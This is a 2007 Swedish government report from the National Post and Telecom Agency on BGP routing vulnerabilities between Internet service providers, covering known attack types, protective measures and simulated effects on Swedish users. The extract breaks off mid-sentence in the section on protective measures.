Security threats within the interdomain routing
advertisement
DATE
26 April 2007
REPORT NUMBER
PTS-ER-2007:14
ISSN 1650-9862
FILE REFERENCE
06-11670
Threats to security in the
exchange of traffic between
Internet service providers
Description and testing of vulnerabilities
Foreword
The National Post and Telecom Agency works with issues concerning the
accessibility and security of the Internet, which also encompasses systems for the
exchange of traffic between Internet service providers. This type of
interconnection is decisive for the Internet functioning as a global network where
all parties can reach one another. Interconnection takes place at exchange points
with functions for routing, 'border routing', between the networks of different
Internet service providers. When the information controlling the border routing
function is manipulated by criminal acts or becomes incorrect due to mistakes, the
consequence may be that traffic is either blocked to certain destinations or that it
is redirected to a destination that was not intended.
This study was carried out with the aim of increasing insight into the risk of the
vulnerabilities associated with different types of attack being utilised against the
interconnection function and to provide recommendations to the relevant
stakeholders.
This report was written by Anders Rafting.
Marianne Treschow
Director General
Post- och telestyrelsen
Contents
Summary (in Swedish) .................................................................................................7
Summary (in English)...................................................................................................8
1
The National Post and Telecom Agency (PTS) is striving for a more
secure exchange of traffic between Internet service providers ......................9
1.1 A more secure exchange of traffic is one of the measures for
improved Internet security ............................................................................9
1.2 The aim is to describe and test vulnerabilities to increase awareness
of the risks ....................................................................................................9
1.3 The goal is to develop improved advice for security-enhancing
measures for Internet service providers .......................................................9
1.4 Testing vulnerabilities, attacks and consequences ......................................9
1.5 Logical vulnerabilities are included.............................................................10
1.6 Instructions to the reader............................................................................10
2
Interconnection is a precondition for the existence of the Internet ..............11
2.1 Internet traffic is relayed globally through interconnection at
exchange points .........................................................................................11
2.2 The operators' internal network infrastructure is grouped into
independent administrative domains..........................................................11
2.3 Routing of traffic between Internet service providers is based on a
policy...........................................................................................................13
2.4 Information about suitable routes to certain destinations is
disseminated globally .................................................................................13
3
Interconnection functions are vulnerable to attack ........................................15
3.1 Security is not built in from the start ...........................................................15
3.2 The interconnection function has known security shortcomings ................15
3.2.1
Measures have been taken in respect of most of the known
vulnerabilities in the existing version of BGP ..............................16
3.2.2
Vulnerabilities in the underlying transport protocol are
difficult to exploit..........................................................................16
3.2.3
A method for increased information security is currently
being used in the transport protocol............................................17
3.2.4
DoS attacks can cause serious disruptions – but protection
is available ..................................................................................17
3.3 Vulnerabilities will be inherited by the Next Generation Networks .............17
3.4 Few have the skills to disrupt interconnection functions ............................18
3.5 Traffic does not arrive at its destination if routing information is
wrong ..........................................................................................................18
4
Methods to increase interconnection security ................................................20
4.1 Existing protective measures make attacks difficult...................................20
4.2 Filtering is used to provide protection against false information ................20
4.3 Security is available for underlying protocols .............................................21
4.4 Proposal for increased security through cryptographic methods ...............21
5
Testing methods and test results pertaining to interconnection
vulnerabilities......................................................................................................22
5.1 Physical experiments in laboratory networks with attacks against
known vulnerabilities ..................................................................................22
5.2 Simulations gave a good indication of the consequences of attacks
for users in Sweden....................................................................................22
5.2.1
The simulations focused on manipulated routing
information...................................................................................23
5.2.2
Difficult to obtain complete input data for the simulations...........23
5.2.3
Attacks by routing traffic to a false destination............................23
National Post and Telecom Agency
5
Contents
5.3
5.4
5.5
6
The test results show that the consequences in Sweden become
more serious if a dominant Internet service provider is attacked ...............24
5.3.1
Attacks have more serious consequences if a significant
operator is attacked .....................................................................24
5.3.2
Up to 70% of users can be affected ............................................24
Instructions for protective measures...........................................................24
PTS is continuing to study and monitor developments within the area ......26
Conclusions and proposals for increased security ........................................27
Bibliography ................................................................................................................31
Appendices
Appendix 1 - Introduction to the Border Gateway Protocol..... 3323
Appendix 2 - Exchange points................................................. 3523
Appendix 3 - Testing of vulnerabilities in the border routing
system ............................................................... 3723
6
National Post and Telecom Agency
Sammanfattning
Funktionen som hanterar samtrafik mellan Internetoperatörer som i branschen
kallas gränsrouting, är en kritisk funktion i Internetinfrastrukturen. Den
ursprungliga konstruktionen av funktionen innefattade dessvärre inte något
grundläggande stöd för att säkra informationen i systemet och som med all
utrustning som exponeras på öppna nät, finns risk för attacker som utnyttjar
sårbarheter i mjukvaran. Denna studie är inriktad på att studera kända sårbarheter
och att ta reda på i vilken utsträckning genomförda attacker skulle kunna påverka
svenska användare. Avsikten har varit, dels att undersöka i vilken mån
skyddsåtgärder används för de kända sårbarheterna, dels att hjälpa till att sprida
kunskap om de skyddsåtgärder som står till buds och bör tillämpas. Vidare har
syftet varit att identifiera de åtgärder som ger det största utbytet i fråga om att
minska antalet användare som negativt påverkas vid en attack.
Utifrån de experiment som genomförts med kända attacker, kan vi konstatera att
vissa typer av sårbarheter är mycket svåra att utnyttja. Detta gäller särskilt det av
gränsroutingprotkollet använda transportprotokollet, där nyare versioner av
mjukvaran har förbättrats och vissa smärre modifieringar gjorts i hanteringen av
meddelanden. Detta gör det svårt att genomföra vissa typer av attacker utom i de
fall angriparen kan avlyssna trafiken på förbindelsen. Belastningsattacker mot
samtrafik har inte uppmärksammats lika mycket som de som gjorts mot annan
infrastruktur, men hotet finns och det är viktigt att vidta skyddsåtgärder. Det är
viktigt att uppdatera mjukvaran på routrar och annan infrastrukturutrustning, då
allt fler ägnar sig åt att leta sårbarheter även i infrastrukturen att utnyttjas för
attacker. För att ge skydd mot ännu okända sårbarheter, krävs åtgärder bland
annat genom att tillämpa de råd och anvisningar som finns att tillgå.
Simuleringarna av de potentiella följdverkningarna av attacker på Internet i
Sverige fokuserades på att studera attacker som bygger på introduktion av falsk
routinginformation i systemet. Vid attacker utgående från nät tillhörande svenska
Internetoperatörer, varierar konsekvenserna från att inga andra operatörer och
deras abonnenter påverkas till att upp till 60-70% av de svenska användarna skulle
kunna påverkas. Det är främst attacker mot dominerande operatörer som leder till
att en stor del av slutanvändarna påverkas, medan attacker mot övriga operatörers
nät bara leder till att färre än 10% av användarna drabbas. Det är önskvärt att det
på längre sikt byggs in bättre säkerhet i protokollet för IP-baserad samtrafik,
eftersom dagens skyddsmetoder inte ger en heltäckande lösning.
De viktigaste råden och anvisningarna när det gäller system för IP-baserad
samtrafik är att uppdaterad mjukvara alltid används, utökad och adekvat filtrering
tillämpas, befintliga anvisningar och mallar används samt att berörda aktörer
medverkar till att standardiserade metoder för spårbarhet och dataintegritet
utvecklas och införs.
National Post and Telecom Agency
7
Contents
Summary
The interdomain routing system is a critical part of the Internet infrastructure.
Unfortunately, the original design did not include mechanisms to secure the
information in the system and, as is the case for any equipment that is exposed in
the network, there is the possibility of attacks. Thus, vulnerabilities are currently
known to exist and there is a great deal of interest in improving the security of the
routing system. The goal is partly to examine the extent to which protection is
available, partly to spread knowledge about protective measures, and to reduce the
number of affected users.
The attack experiments with known attacks in lab networks indicate that certain
types of threat, for instance attacks against TCP connections to break or affect
BGP peering sessions, are significantly more difficult to carry out in practice than
has previously been indicated in certain reports. Newer software versions have
improved the protocol implementations and include some modifications to the
treatment of key messages which makes it very difficult for an attacker to succeed
unless traffic on the link can be monitored. Additional protection of peering
connections can be afforded by MD5-based protection, although it appears to
carry with it some risks that the increased CPU load could be exploited for DoS
attacks. Simple DoS attacks targeting the infrastructure are a known phenomenon
but have perhaps not received as much attention as other types of attack (with the
exception of the DNS root server attacks), but our results indicate that they pose
a more tangible threat than sequence number attacks against TCP.
The results suggest that deaggregations by customer autonomous systems (AS)
have a very small probability of impacting on the system, thanks to extensive
defensive filtering. The impact from attacks launched from different Swedish ISP
AS, on the other hand, varies from none (in about half the scenarios) to up to 6070% of the end users being affected. However, due to market concentration there
are only a few scenarios that lead to extensive consequences, and for most
scenarios fewer than 10% of the users are affected. The simulations point to
specific scenarios that can potentially lead to serious impact and it would be
interesting to follow up the specifics with ISPs to validate the policy information
from the Routing Registry and to determine whether it would be feasible to
introduce certain stricter filters for these specific scenarios. As a longer-term goal,
it would be better to strive for better security support being incorporated into the
protocols since filtering cannot provide a complete solution.
8
National Post and Telecom Agency
1
The National Post and Telecom Agency (PTS) is
striving for a more secure exchange of traffic
between Internet service providers
1.1
A more secure exchange of traffic is one of the measures
for improved Internet security
In December 2006, the Swedish Government decided on a strategy to improve
Internet security. PTS is implementing a number of measures in accordance with
the strategy contained in the action plan. One of the measures described in this
report is that PTS should strive for a more secure exchange of traffic between
Internet service providers.
1.2
The aim is to describe and test vulnerabilities to increase
awareness of the risks
In order to enhance awareness of the risks, this work aims to describe and test
vulnerabilities and threats, and to make an impact analysis of the disruption of
functions affecting the exchange of traffic between Internet service providers.
1.3
The goal is to develop improved advice for securityenhancing measures for Internet service providers
Tests carried out as part of this work are expected to provide an indication of the
vulnerabilities that must first be dealt with and how different types of attack affect
the service providers, their interconnection partners and subscribers. The goal is
to propose that general advice, known as 'Best Common Practices' (BCP), is used
and if possible to contribute to updates of existing advice and instructions
regarding the security of the exchange of traffic function. One desired effect is to
enhance security in that part of the interconnection function dealing with border
routing through stakeholders with operational responsibility applying improved
BCP. It is also hoped that an improved understanding of the relative risks will
result in the Internet service providers' resources directed at improving security
being prioritised in a rational way to the areas where they are most worthwhile.
1.4
Testing vulnerabilities, attacks and consequences
The work is based partly on experiments with physical router equipment, partly
on simulations to assess the resulting effects on a larger scale. It is hoped in this
way to gain a better understanding of the types of attack that are known to exist
with reference to potential realisation, consequences and countermeasures.
National Post and Telecom Agency
9
Contents
A model was developed for the simulations which enabled us to assess the
consequences of different attack scenarios, firstly regarding the type of attack and
secondly regarding the point at which the attack entered the system. In the final
phase of the project, further experiments were carried out using physical
equipment to study certain basic attack mechanisms in detail and this provided
further input data for the simulation model. Experiments and simulations were
carried out in collaboration with Michael Liljenstam from Omicron Ceti AB.
1.5
Logical vulnerabilities are included
The work includes investigations of logical vulnerabilities in contrast to physical
vulnerabilities. Logical vulnerabilities mean weaknesses that can be exploited in
attacks that do not aim to physically destroy or disrupt network equipment, but
instead, for example, manipulate control traffic, storage or processor capacity, or
gain access to the equipment's command line interface.
The vulnerabilities or potential vulnerabilities that are to be illustrated in this
project generally include:
1.6
•
Manipulation of router configuration as a consequence of intrusion or by
means of an insider
•
Different types of DoS attack on border routers
•
Disruptions by exploiting software vulnerabilities.
Instructions to the reader
The main part of this report describes overall vulnerabilities, threats and
protective measures, as well as references to advice and instructions, i.e. Best
Common Practices, for achieving increased security for interconnection; that is,
the exchange of traffic between Internet service providers. For this reason, the
report can be read by the general public and by those who wish to know why
increased security in this respect is necessary and the ways in which it can be
achieved. Appendices 1 and 2 include a short description of the functions related
to the exchange of Internet traffic/interconnection.
For those interested in the technical aspects, Appendix 3 contains a full report on
how the vulnerabilities were tested using simulations and physical experiments.
Abbreviations and terms can be found at the end in Appendix 3, Appendix E.
10
National Post and Telecom Agency
2
Interconnection is a precondition for the existence
of the Internet
Internet traffic is relayed globally through interconnection at exchange points
The operators' internal network infrastructure is grouped into independent
administrative domains
Routing between autonomous systems is based on a policy
Information about suitable paths to certain destinations is disseminated globally
2.1
Internet traffic is relayed globally through interconnection
at exchange points
The possibility of interconnection taking place between Internet service providers
where traffic is relayed over the operators' borders has led to the Internet having
become a global network where all parties can reach one another. For example, it
must be possible to relay e-mail to destinations outside the operator's network in
which the originator is located. This is realised by means of exchange points, to
which two or more operators are connected, at different places in the world.
These exchange points have equipment that routes traffic within 'border routers',
whose function is to determine the appropriate path to an external network by
means of the standard protocol, the Border Gateway Protocol (BGP) version 4.
This standard has been developed by the Internet Engineering Task Force
(IETF).
2.2
The operators' internal network infrastructure is grouped
into independent administrative domains
In order to be able to control the networks, those networks that lie within the
same administrative operational responsibility are grouped into independent
domains called 'autonomous systems' (AS). These AS usually consist of an
Internet service provider but can also be an undertaking. Each AS has a unique
AS number (ASN) that functions as a means of identification when exchanging
traffic with other AS at exchange points, known as 'Internet Exchange Points'
(IXP).
National Post and Telecom Agency
11
Contents
Public IXP
AS6
AS5
Private IXP
AS8
AS1
AS2
AS3
AS7
AS4
Autonomous systems (AS) exchange traffic with each other at exchange points.
As mentioned above, an organisation other than an Internet service provider, for
example an undertaking, can, as a customer of an operator, also be connected to
two or more operators' networks through what is known as 'multihoming'. This
technology guarantees that the undertaking's resources (web servers, e-mail
accounts, etc.) are accessible via several routes for increased redundancy. An
Internet connection that is multihomed to different AS requires systems with
functions for border routing that use BGP. Market stakeholders using BGP are
often called 'BGP speakers' as they communicate with 'peers' and are said to share
a 'peering connection' for the exchange of routing information. In most cases, a
network operator constitutes one AS, but larger operator networks can be divided
into two or more AS. Border routers that deal with an operator's incoming and
outgoing traffic exchange information about in which AS or in which part of their
own AS they believe a certain network address to be located. The autonomous
systems are identified by numbers, 'autonomous system numbers' (AS numbers).
These AS numbers are obtained from ICANN's Regional Internet Registry (RIR)
which is responsible for Europe and nearby regions, namely Reseaux IP Européen
(RIPE), following an application to RIPE NCC (Network Coordination Centre).
There are five RIRs in total in the world, each dealing with one region.
12
National Post and Telecom Agency
2.3
Routing of traffic between Internet service providers is
based on a policy
The routing of IP traffic or border routing between the networks of different
Internet service providers, i.e. AS, is done on the basis of a system of rules or a
'policy' determined by the respective operator. An AS is made up of a large
number of interconnected IP networks. Each AS is clearly defined to control the
interconnection function.
An IP packet is routed within one AS on the basis of a decision that in the majority
of cases is based on a numerical value derived from technical parameters such as
the shortest route, rate and loading.
In order to route the exchange of IP traffic between AS over operator borders, one
and the same protocol, namely the Border Gateway Protocol (BGP) version 4, is
now being used to relay routing information over operator borders, 'interdomain
routing'. In this case, routing decisions are based on a policy rather than purely
technical parameters. BGP is used to build complicated policy-based architectures
and includes a number of attributes that can help to establish a policy to make the
right decision. A BGP router at an ISP may have several alternative routes for
reaching a certain destination. Without a policy, the routers would choose the
route with the shortest AS path; that is, which needs to pass through the least
number of AS. A number of attributes in the routers' decision-making process are
assessed in a pre-determined order when establishing the policy, for example
Local Preference, which means that an ISP can give preference to a route with a
longer AS path over a shorter one. This means that operators should have better
control over routing and be able to make decisions that are based on a number of
criteria.
A policy also stipulates rules for the filtering of routing information as a tool to
control how traffic is relayed; for example, if filtering is required for traffic
coming from an external network into one's own network, referred to as
'defensive filtering' or 'route filtering' which is to be advertised to other networks.
The only accessible public source for setting up the correct defensive filtering is
the Internet Routing Registry, which contains a policy for each Internet service
provider. It is consequently important that the operators affected ensure that they
keep the information about their policy up to date.
2.4
Information about suitable routes to certain destinations is
disseminated globally
The unique number held by every AS is used for identification and to form part
of the routing information about suitable routes, 'AS paths', through the Internet
to a certain network address, 'prefix'. This information is advertised to other
operators and is propagated globally throughout the Internet. This is done by
border routers using BGP systems that exchange and disseminate information,
partly about which network addresses are applicable, partly by indicating the order
in which different AS must pass through AS paths in order to reach these network
National Post and Telecom Agency
13
Contents
addresses. This information about routes to certain destinations, expressed as an
'AS path' and 'prefix', is called a 'route' and is disseminated from operator to
operator by advertisements in the 'UPDATE messages'.
Each border router builds up its own databases, known as 'routing tables', by
listening to other routers and using this data together with their own knowledge
and policy. With this help, incoming and outgoing traffic are relayed for different
applications, such as the Web, e-mail and telephony.
AS37 updates its routing table with
the prefix=128.89.88/23 and the
corresponding AS path=37,12
AS37
Hello AS37, You
can reach
Net A via me
da
Up
te
g
ssa
me
e
AS12
AS2
Hello AS2
You can
reach
Net A via me
and AS12
AS2 updates its routing
table with the
prefix=128.89.88/23 and
the corresponding AS
path=2,37,12
Net A 128.89.88/23
AS12 has a network, Net A, and
has updated the routing table with
the prefix=128.89.88/23 and the
corresponding AS path=12
OK, here´s
traffic to Net A
In the above figure, AS12 advertises Net A (which lies within its adminstrative domain) by sending
an UPDATE message to its neighbour AS37, with which interconnection (peering) takes place.
AS37 forwards the routing information to its other neighbour AS2. AS37 and AS2 add their
respective AS numbers to the AS path.. AS2 can now relay traffic to Net A according to the route
specified, i.e. the AS path and the network prefix 128.89.88/23.
14
National Post and Telecom Agency
3
Interconnection functions are vulnerable to attack
Security is not built in from the start
The interconnection function has known security shortcomings
Vulnerabilities will be inherited by the Next Generation Networks
Few have sufficient skills to disrupt interconnection functions
Traffic does not arrive at its destination if routing information is wrong
3.1
Security is not built in from the start
When the BGP protocol was designed, not much account was taken of security
aspects. This has led to the current functions for border routing having certain
well-known, fundamental inadequacies as regards ensuring the correctness of
information in the routing system. This means that there is no opportunity to
verify whether the address and routing information disseminated from operator to
operator was originally initiated by the rightful owner of the address space
affected and that the information is complete and has not been distorted. There is
also a risk of false routers being connected in order to direct traffic to the wrong
recipient. Another vulnerability is that BGP is transmitted on top of another
protocol, the Transmission Control Protocol (TCP), which also has security
shortcomings and may be attacked.
The most well-known case by far is an incident in 1997 when border routing
information leaked out and resulted in large-scale disruptions. This incident led to
an increased understanding of BGP's lack of inbuilt security functions and helped
to initiate the development of proposals for new security mechanisms.
3.2
The interconnection function has known security
shortcomings
A number of systematic studies have been carried out to analyse potential
vulnerabilities in the routing system.
In addition to the above-mentioned lack of protection of authenticity and
protection against changes (integrity) to routing messages, the following are
examples of well-known problems that recur in these studies:
•
Direct DoS attacks against routers in the network so as to disrupt the
routing system
•
The initiation of 'route flapping', which means that a border router
repeatedly advertises to the surrounding world through the UPDATE
National Post and Telecom Agency
15
Contents
message that a route exists and immediately afterwards that it no longer
exists
•
The 'route dampening' mechanism can be used by attackers so that limited
disruptions result in a more extensive loss of connections with other
operators. Route dampening is used to prevent loading on border routers
caused by continual changes to incoming routing information
•
One powerful way of disseminating routing information is to use 'router
aggregation'. This saves capacity, but at the same time a potential
vulnerability may arise since an attacker's manipulation there could have
serious consequences. Very serious consequences may arise if routing
information becomes false through intentional or unintentional actions.
Another vulnerability is that BGP uses the Transmission Control Protocol (TCP)
as a carrier on top of the Internet Protocol (IP). If an attacker sends TCP a restart
message when attacking a router, the BGP session stops and is restarted once
again, which takes time and causes disruptions. If this is repeated at short
intervals, an entire AS can be locked out from the Internet. Alternatively, a
synchronisation command for TCP can be sent to the router that the router must
then deal with. The rapid repetition of SYN commands results in an overloading
situation for the router with the consequence that users will not be able to reach
certain parts of the Internet.
Vulnerabilities will be discussed in Appendix 3, where the vulnerabilities studied
in this report are described in detail.
3.2.1
Measures have been taken in respect of most of the known
vulnerabilities in the existing version of BGP
As the experiments were related to attacks that were previously known about, new
software versions include measures against all of these vulnerabilities, which were
due to implementation faults in the software for the current version of BGP. For
example, this applies to the different forms of disruptive attack tested in the
experiments and the IPv6 vulnerability that was exploited to show that it was also
possible to write functioning intrusion codes against routers. However, the
experiments underlined the importance of upgrading router software as well as
that on personal computers, as a greater awareness of the security holes in the
infrastructure will probably lead to further vulnerabilities being discovered. In
reality, most operators are well aware of this so that it is highly unlikely that a
software version vulnerable to the attacks tested in the experiments will continue
to be used.
3.2.2
Vulnerabilities in the underlying transport protocol are difficult to
exploit
Vulnerabilities that are instead related to weaknesses in the design of certain
protocols, such as for example the TCP vulnerabilities that were discussed much
earlier, can be difficult to remedy. The TCP-related attacks nevertheless proved to
be more difficult to carry out in practice than is sometimes intimated and, if
modern software versions are used, improvements in the implementation of and
16
National Post and Telecom Agency
certain modifications to the protocol have also made it very difficult to succeed
with this type of attack.
3.2.3
A method for increased information security is currently being used in
the transport protocol
It is also difficult to exploit vulnerabilities in TCP even if protection for the TCP
connections through the prevalent cryptographic method Message Digest 5
(MD5) is used. Many stakeholders started to use this method in the wake of the
attention surrounding TCP vulnerabilities. MD5-based protection provides
further security, for example through verification of the other party, but the
experiments also indicate that the cryptographic calculations may result in
additional CPU loading that could be exploited by an attacker for a DoS attack if
appropriate protection is not used to counter this.
3.2.4
DoS attacks can cause serious disruptions – but protection is available
Some simpler forms of DoS attack were also tested. It can be deduced from these
experiments that the risk of serious consequences in the event of relatively simple
DoS attacks, e.g. by sending large amounts of routing information to a border
router, appears to be greater than several of the more complicated types of attack.
However, the DoS attacks are a known phenomenon and there are a number of
protective measures available. One variant that has not been studied very much
until now in combination with router security is a 'reflection attack', which means
an attack against a target initiated from several directions. In order to also have
good protection against this, it is recommended that one ensures that the other
party in the event of peering connections also maintains a good level of security.
Many forms of DoS attack can also be avoided if the ability to falsify the
originator's IP address is blocked. An objective of broader filtering of traffic with
falsified addresses before it is propagated further towards a transit network would
consequently also benefit security in the routing system.
3.3
Vulnerabilities will be inherited by the Next Generation
Networks
The imminent migration to IP-based technology in what is often referred to as the
'Next Generation Network', will contribute to an increase in traffic at exchange
points for the exchange of Internet traffic. This is due to the fact that the
exchange of traffic that currently takes place in special systems for circuitswitched communication will instead take place at exchange points for the
Internet and IP-based traffic. The risk of disruptions and interruptions will
increase when networks converge to one and the same packet-switched
technology, together with the fundamental vulnerabilities in the function for IPbased interconnection. Disruptions and attacks that affect the common
technology for interconnection may have devastating consequences if suitable
protective measures are not taken and extensive redundancy is not built in from
the start.
National Post and Telecom Agency
17
Contents
A number of actual and conceivable problems can be identified in this context.
The most important growth-related factor is BGP convergence time, i.e. the time
required for a border router to adapt to sudden changes in the performance or
topology of the network. In this connection, the router must update its routing
tables so that these reflect reality, which places requirements on memory capacity
and processor power. A very stable border routing function is required to update
and manage a routing table that currently comprises 300 000 items and will be
even larger in the future.
Another factor that requires border routers to have more capacity is the new
standard IP version 6 (IPv6). Malicious forces may in the future be tempted to
make large efforts – through DoS attacks directed at memory and CPU – to
attempt to knock out selected parts of the border routing function, upon which
function an increasingly large proportion of applications with communication
over operator borders will rely.
3.4
Few have the skills to disrupt interconnection functions
BGP is complex and few have the skills to maliciously disrupt BGP traffic. On
the other hand, mistakes and insiders can cause substantial disruptions. The
intention of this study was to provide an improved understanding of the risks
associated with attacks that use possible vulnerabilities in the routing system. By
'risks', we mean here the combination of the likelihood of a successful attack and
the consequence that the attack entails. The likelihood of a threat being realised
against BGP routers is assessed as being relatively slight, but the consequences
may become very difficult in special cases and result in the Internet becoming
more or less inaccessible.
3.5
Traffic does not arrive at its destination if routing
information is wrong
False BGP routing information may, for example, direct traffic to a network that
does not have the network addresses being sought, which means that users do not
reach the website they are looking for or that e-mail does not arrive. Traffic can
by a malicious action be directed to something that resembles a 'black hole' and
simply disappear, which results in similar consequences for users.
By successfully manipulating the routing system, it is possible to either block
traffic to certain destinations or redirect traffic without the user's knowledge.
Currently, the exchange of Internet traffic and other IP-based traffic occurs in
exchange points with BGP. The exchange of circuit-switched traffic currently
takes place in separate systems. When migration to the Next Generation
Networks (NGN) and their packet technology starts, an increasingly large
proportion of the traffic sent between operators will be handled by border routers
with BGP. Through this convergence, the consequences of a disruption or
18
National Post and Telecom Agency
interruption in the interconnection function are at risk of becoming more serious
by means of reduced diversity in the technology used.
National Post and Telecom Agency
19
Contents
4
Methods to increase interconnection security
Filtering is used to provide protection again false information
In practice, it is very difficult to filter traffic from a transit operator
Security is available for underlying protocols
Proposals for increased security have been produced
4.1
Existing protective measures make attacks difficult
The previous section may suggest that it is relatively easy for an attacker to cause
damage and disrupt interconnection in various ways, i.e. the function for the
exchange of traffic between Internet service providers. In order to provide a fairer
picture, the existing protective measures that are available should also be taken
into account, many of which many have been developed recently in conjunction
with increased security awareness. A selection of these is discussed below to
demonstrate how a type of attack can be blocked and the security holes that may
possibly remain.
4.2
Filtering is used to provide protection against false
information
Information in the system is currently protected by means of 'defensive filtering',
where filters are added to prevent false information coming into the system and
being propagated further. However, for practical reasons it is impossible to
achieve complete protection. As the routing system comprises a large number of
administratively separated parts, some form of coordination is required to order
to be able to design filters. The Internet Routing Registry was created for this very
reason. However, the quality of the maintenance of the different objects in the
Routing Registry varies, for which reason errors may arise due to old or false
information. Even if it were possible to design perfect filters, there are practical
barriers to using them at all points in the network. The global routing table
currently comprises almost 300 000AR network destinations or 'prefixes', which
means that central AS in the network would have to use filters with just as many
rules. This firstly presents a risk of problems being created with router
performance as so many rules have to be managed and, secondly, it is impractical
to design and maintain configurations with so many rules.
It is common for ISPs to filter information about routes received from their
customers, as these are of limited size and one has good control over what the
information ought to look like. Large ISPs sometimes require their customers to
create filters themselves that they can subsequently install in order to be able to
filter the customers' transit customers. It is impractical to filter between the largest
20
National Post and Telecom Agency
ISPs because of the large number of routes, while the situation at the lower levels
varies as regards filtering when peering. The result is that AS at the lower levels
must depend in most cases on the information received from above being correct,
while attempting to protect the system from false information leaking in from
outside the core.
See Appendix 3 for a more comprehensive description of protective measures.
4.3
Security is available for underlying protocols
Security is currently partly based on filters that prevent irrelevant or false routing
information being accepted, used or disseminated further. For several years now,
a method has been used to ensure that messages sent via the Transmission
Control Protocol (TCP), i.e. the transport protocol within which BGP is packeted,
have not been changed en route and that the originator is correct. This is done
through a method known as 'MD5 hashing', which means that a check sum is
calculated for each TCP packet, which is then encrypted using a common key for
BCP routers communicating in pairs.
4.4
Proposal for increased security through cryptographic
methods
Various methods have been proposed to make the exchange of critical routing
information between AS more secure, for example the Secure Border Gateway
Protocol (S-BGP) developed by BBN Technologies and built on cryptography
using asymmetric encryption, i.e. with a public and a private key. By using S-BGP,
originators of BGP information are validated at the same time as unauthorised
changes of the BGP information itself cannot take place without being
discovered. Another method that comes from Cisco Systems is called Secure
Origin BGP (soBGP) and has been tested by APNIC, i.e. the Internet Registry for
the Asia Pacific region. Asymmetric encryption is used here as well. However,
both methods are met with scepticism by operators since much administration,
among other things key administration, is required as is more processor power in
routers than is currently the case. Furthermore, the method has a poor effect on
there not being a broad spread at the same time as no operators want to be the
first out with a completely new software version.
There are other proposals for measures that were presented at the RIPE51
meeting in October 2005 and have been documented under the title 'A Blueprint
for Improving the Robustness of Internet Routing' by Georgos Siganos and
Michalis Faloutsos.
National Post and Telecom Agency
21
Contents
5
Testing methods and test results pertaining to
interconnection vulnerabilities
Physical experiments with attacks against known vulnerabilities were conducted in
laboratory networks
Simulations gave a good indication of the consequences of attacks for users in
Sweden
The simulations focused on manipulated routing information
Difficult to obtain complete input data for the simulations
Attacks were carried out by routing traffic to a false destination
The test results show that the consequences in Sweden become more serious if a
dominant Internet service provider is attacked
Up to 70% of end users can be affected by an attack if a stakeholder with a key
role in the routing system is the main target
5.1
Physical experiments in laboratory networks with attacks
against known vulnerabilities
The first step was to conduct an experiment to verify known vulnerabilities using
attacks on the physical routers of three different laboratory networks in order to
illustrate the potential for the exploitation of known vulnerabilities. The
experiment aimed first at providing information about the level of difficulty in
carrying out an attack, secondly to check that the vulnerabilities are remedied or
to make an assessment of the extent to which some weaknesses may persist, and
finally to be able to classify the 'local' consequences of an attack carried out; in
other words, how they affect the specific router being attacked. The local
consequences are subsequently extrapolated within a simulated environment using
a model of the Internet in Sweden.
5.2
Simulations gave a good indication of the consequences of
attacks for users in Sweden
A simulation model was developed to provide a better indication of the
consequences of different attacks on a larger scale. The model represented the
Internet in Sweden and helped to measure the consequences of different attack
scenarios. The attacks varied as regards the type of attack as well as the point at
which the attack entered the system. The model was designed to enable a course
of events in the routing system to be studied, when certain organisations or
sectors that are critical to society are exposed to attacks directed at the routing
system, and to be able to quantify the extent of Swedish Internet users that could
22
National Post and Telecom Agency
be affected. We can assess the risks associated with the scenario by using this
information together with a rough estimate of the likelihood of an attack
succeeding. It is hoped that an improved understanding of the relative risks may
result in resources directed at improving security being prioritised in a rational
way to the areas where they are most worthwhile.
5.2.1
The simulations focused on manipulated routing information
The simulations to extrapolate the consequences to a larger national plan were
focused in particular on attacks based on the introduction of false routing
information into the system, as it proved difficult to collect sufficiently detailed
information about network topology in order to study simple disruptive attacks in
any effective way. The model focused on Swedish interests and users and
therefore principally represented AS that appear to have some form of Swedish
connection.
5.2.2
Difficult to obtain complete input data for the simulations
When building the model at a level that was suitable for studying false routing
information, the most important input data included the existence of exchange of
traffic connections between AS, and the routing policies used to direct the
exchange and achieve defensive filtering. The only public source available for
routing policies is the Internet Routing Registry. However, it is well known that
the data in these databases has certain shortcomings owing to inadequate updates,
which have to be performed manually. Consequently, the simulation results are
dependent on the quality of input data for the model. Signs of such shortcomings
were also apparent when validating the model but, following certain measures that
were undertaken to attempt to deduce some further information to improve the
model, a result was attained that appears to have relatively good correspondence
to reality.
5.2.3
Attacks by routing traffic to a false destination
The type of attack, which was simulated based on false routing information,
sometimes occurred through a prefix in a route being hijacked via 'deaggregation',
which means that a prefix is changed to become more specific so that routing
becomes incorrect. This type of attack was also carried out by advertising the
same prefix. Hijacking a route could possibly be used for a disruptive attack to
prevent users from reaching certain services or information, or to redirect traffic
to false websites without the users' knowledge in order to gather sensitive
information, as with phishing or pharming. A large number of scenarios were
simulated in which several variables were changed. The target of the attack varied
between objects that represented a number of different organisations. Two
commercial banks, two Internet brokers, a media company (news) and a public
authority were chosen for this purpose. The starting point for the attack varied
between all AS that were found in the model, i.e. AS belonging to Swedish ISPs,
AS belonging to transit customers that are not ISPs themselves and some foreign
ISPs.
National Post and Telecom Agency
23
Contents
5.3
The test results show that the consequences in Sweden
become more serious if a dominant Internet service
provider is attacked
5.3.1
Attacks have more serious consequences if a significant operator is
attacked
The broad outlines that emerge from 'deaggregation attack' scenarios are that the
consequences, in terms of the proportion of Swedish users that are potentially
affected, do not primarily depend on which AS is the target of the attack; rather it
largely depends on where the attack is coming from, i.e. where the information is
being propagated from. This is a consequence of the 'influence' of different AS,
and thus the filtering policy, varying.
5.3.2
Up to 70% of users can be affected
The consequences vary from 'no effect beyond the AS itself' to anything between
60% and 70% of users being affected. Here, market concentration plays an
important role, insofar as in most cases only a limited proportion of users risk
being affected (typically under 10%) and only in a few cases is a larger proportion
involved. That is, certain AS (especially the largest ISPs) play a key role, both in
terms of having the most users and having a connection to many other AS.
Consequently, only scenarios affecting these central stakeholders have a really big
impact. On the other hand, if attacks are initiated from typical customer AS, the
results suggest that there would be a very small potential for affecting the system.
This appears to be in line with the current practice of using defensive filters in
relation to customers. Conservative assumptions were made when constructing
the model as information was missing. For this reason, the estimated
consequences were to be provided in the form of a lower limit rather than be
overestimated. It is consequently possible that supplements to the information
may result in indicators suggesting greater consequences.
5.4
Instructions for protective measures
Instructions and good advice are available in the form of Best Common Practices
in order to protect oneself not only against known but also against potential new
threats to interconnection through border routing. Some references for sources of
these are provided below and in Appendix 3, Section 4. Templates for configuring
border routers, which have been developed by Team Cymru, a research team
within the field, are often mentioned as a good starting point; for example,
